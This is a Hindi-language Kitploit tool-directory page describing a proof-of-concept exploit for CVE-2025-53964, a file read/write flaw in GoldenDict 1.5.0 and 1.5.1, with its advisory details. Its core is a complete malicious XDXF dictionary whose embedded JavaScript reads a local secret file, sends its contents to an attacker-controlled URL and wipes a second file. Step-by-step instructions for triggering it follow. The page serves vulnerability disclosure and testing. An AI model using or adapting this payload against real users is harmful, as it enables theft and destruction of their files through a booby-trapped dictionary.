Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-53964 — CVE-2025-53964 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण: GoldenDict 1.5.0/1.5.1 में दुर्भावनापूर्ण XDXF शब्दकोश के माध्यम से दूरस्थ फ़ाइल पढ़ना/लिखना, अस्वच्छित XML और JS निष्पादन का लाभ उठाते हुए। | Kitploit
उपकरण/GitHubGitHub/tigr78/cve-2025-53964
स्थैतिक विश्लेषणभेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubtigr78/cve-2025-53964

CVE-2025-53964

CVE-2025-53964 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण: GoldenDict 1.5.0/1.5.1 में दुर्भावनापूर्ण XDXF शब्दकोश के माध्यम से दूरस्थ फ़ाइल पढ़ना/लिखना, अस्वच्छित XML और JS निष्पादन का लाभ उठाते हुए।

रिपॉजिटरी देखें
1010 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-53964

जोखिम मूल्यांकन

CVSS v3: (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L) - 9.6/10

विवरण

GoldenDict 1.5.0 और 1.5.1 में एक उजागर खतरनाक विधि है जो फ़ाइलों को पढ़ने और संशोधित करने की अनुमति देती है जब कोई उपयोगकर्ता एक निर्मित शब्दकोश जोड़ता है और फिर उस शब्दकोश में शामिल किसी भी शब्द की खोज करता है।

अतिरिक्त जानकारी

उत्पाद बाहरी अभिकर्ताओं के साथ बातचीत के लिए इंटरफ़ेस प्रदान करता है, जिसमें GoldenDict (ver. 1.5.0, 1.5.1) में एक खतरनाक विधि शामिल है जो ठीक से प्रतिबंधित नहीं है। यह दूरस्थ हमलावर को उपयोगकर्ता फ़ाइल सिस्टम पर फ़ाइलों को पढ़ने और संशोधित करने की पहुँच प्राप्त करने की अनुमति देता है जब एक तैयार दुर्भावनापूर्ण शब्दकोश जोड़ा जाता है और प्रोग्राम में उपयोग किया जाता है।

भेद्यता प्रकार

CWE-749: उजागर खतरनाक विधि या फ़ंक्शन; CWE-79: वेब पेज निर्माण के दौरान इनपुट का अनुचित तटस्थीकरण ('क्रॉस-साइट स्क्रिप्टिंग')

उत्पाद विक्रेता

GoldenDict Project

प्रभावित उत्पाद कोड आधार

GoldenDict - 1.5.0, 1.5.1

प्रभावित घटक

GoldenDict निष्पादन योग्य, स्रोत कोड फ़ाइल xdxf.cc, स्रोत कोड फ़ाइल xdxf2html.cc, स्रोत कोड फ़ाइल stardict.cc.

हमले का प्रकार

दूरस्थ

कोड निष्पादन प्रभाव

true

सूचना प्रकटीकरण प्रभाव

true

CVE अन्य प्रभाव

उपयोगकर्ता फ़ाइल सिस्टम पर फ़ाइलों को पढ़ने और संशोधित करने की पहुँच

हमले के वेक्टर

भेद्यता का शोषण करने के लिए, एक उपयोगकर्ता को प्रोग्राम में एक दुर्भावनापूर्ण शब्दकोश जोड़ना होगा और उस शब्दकोश में शामिल किसी भी शब्द की खोज करनी होगी।

खोजकर्ता

Grebennikov Timofey, Astra Group के सुरक्षा नियंत्रण विभाग के प्रवेश परीक्षण समूह के विशेषज्ञ।

संदर्भ

https://github.com/goldendict/goldendict/releases

विवरण

GoldenDict विकिपीडिया और स्थानीय रूप से स्थापित शब्दकोशों में शब्दों की खोज के लिए एक ग्राफिकल प्रोग्राम है। XML मार्कअप के साथ XDXF प्रारूप सहित विभिन्न शब्दकोश प्रारूप समर्थित हैं। शब्दकोश इंटरनेट पर अन्य उपयोगकर्ताओं द्वारा वितरित किए जाते हैं।

प्रोग्राम शब्दकोशों से शब्दों को प्रस्तुत और प्रदर्शित करने के लिए एक ब्राउज़र इंजन का उपयोग करता है, जो Qt Widgets घटक पैकेज में शामिल है।

एक साथ कई सुरक्षा उल्लंघनों की खोज की गई, जो एक गंभीर भेद्यता के कार्यान्वयन की अनुमति देते हैं:

  1. XML सामग्री के स्वच्छीकरण का अभाव;
  2. JS कोड निष्पादन पर प्रतिबंध का अभाव;
  3. अक्षम या कमज़ोर CSP नीति।

एक साथ, ये उल्लंघन इंटरनेट से डाउनलोड किए गए XDXF शब्दकोश के XML मार्कअप में दुर्भावनापूर्ण JS कोड एम्बेड करके उपयोगकर्ता फ़ाइलों तक पहुँच प्राप्त करने की संभावना पैदा करते हैं।

प्रूफ-ऑफ-कॉन्सेप्ट

विंडोज़ पर भेद्यता का परीक्षण करने के लिए, आप एक स्क्रिप्ट चला सकते हैं जो फ़ाइल सिस्टम में दो तैयार फ़ाइलों को प्रभावित करती है।

  1. C:\Users\Public\Documents निर्देशिका में दो फ़ाइलें बनाएँ और उन्हें किसी भी सामग्री से भरें:
  • secret.txt – कुछ गोपनीय जानकारी;
  • idea.txt – कुछ महत्वपूर्ण जानकारी जिसे आप खोना नहीं चाहते।
  1. निम्नलिखित सामग्री के साथ एक XDXF-शब्दकोश malicious_dictionary.xdxf बनाएँ:
root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<xdxf lang_from="ENG" lang_to="RUS" format="logical">
    <full_name>Malicious dictionary</full_name>
    <description>You have been pwned!</description>
    <meta_info>
        <copyright>Public Domain</copyright>
    </meta_info>
    <lexicon>
        <ar>
            <k>vuln_test</k>
            <def>
                Some description...
                <script>
                    var secretFile = 'file:///C:/Users/Public/Documents/secret.txt';
                    var ideaFile = 'file:///C:/Users/Public/Documents/idea.txt';
                    var xhr = new XMLHttpRequest();
                    xhr.open('GET', secretFile, true);
                    xhr.onload = function() {
                        var secretData = xhr.responseText;
                        if (secretData.length > 0) {
                            var xhr2 = new XMLHttpRequest();
                            xhr2.open('POST', '[Target-URL]', true);
                            xhr2.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
                            xhr2.send('data=' + encodeURIComponent(secretData));
                        }
                    };
                    xhr.onerror = function() {
                    };
                    xhr.send();
                    var xhr3 = new XMLHttpRequest();
                    xhr3.open('PUT', ideaFile, true);
                    xhr3.setRequestHeader('Content-Type', 'text/plain');
                    xhr3.send("");
                </script>
            </def>
        </ar>
    </lexicon>
</xdxf>

प्रारंभ होने पर, यह शब्दकोश secret.txt की सामग्री को दूरस्थ सर्वर पर भेजेगा और idea.txt को साफ़ करेगा।

  1. [Target-URL] टेम्पलेट को अपने नियंत्रण वाले किसी भी HTTP अनुरोध श्रोता के पते से बदलें।
  2. उत्पन्न शब्दकोश को GoldenDict की स्थानीय शब्दकोश सूची में जोड़ें।
  3. शब्द "vuln-test" खोजें।

हमले की सफलता सत्यापित करें – प्राप्तकर्ता को secret.txt फ़ाइल की सामग्री वाला एक संदेश प्राप्त होगा, और idea.txt फ़ाइल खाली होगी।

भेद्यता Windows और Linux दोनों प्रणालियों को प्रभावित करती है। Linux सिस्टम पर भेद्यता को पुन: उत्पन्न करने के लिए, परीक्षण फ़ाइलों को संग्रहीत करने के लिए विभिन्न निर्देशिकाओं का उपयोग करना और दुर्भावनापूर्ण कोड में इसे निर्दिष्ट करना आवश्यक है।

टूल डाउनलोड करें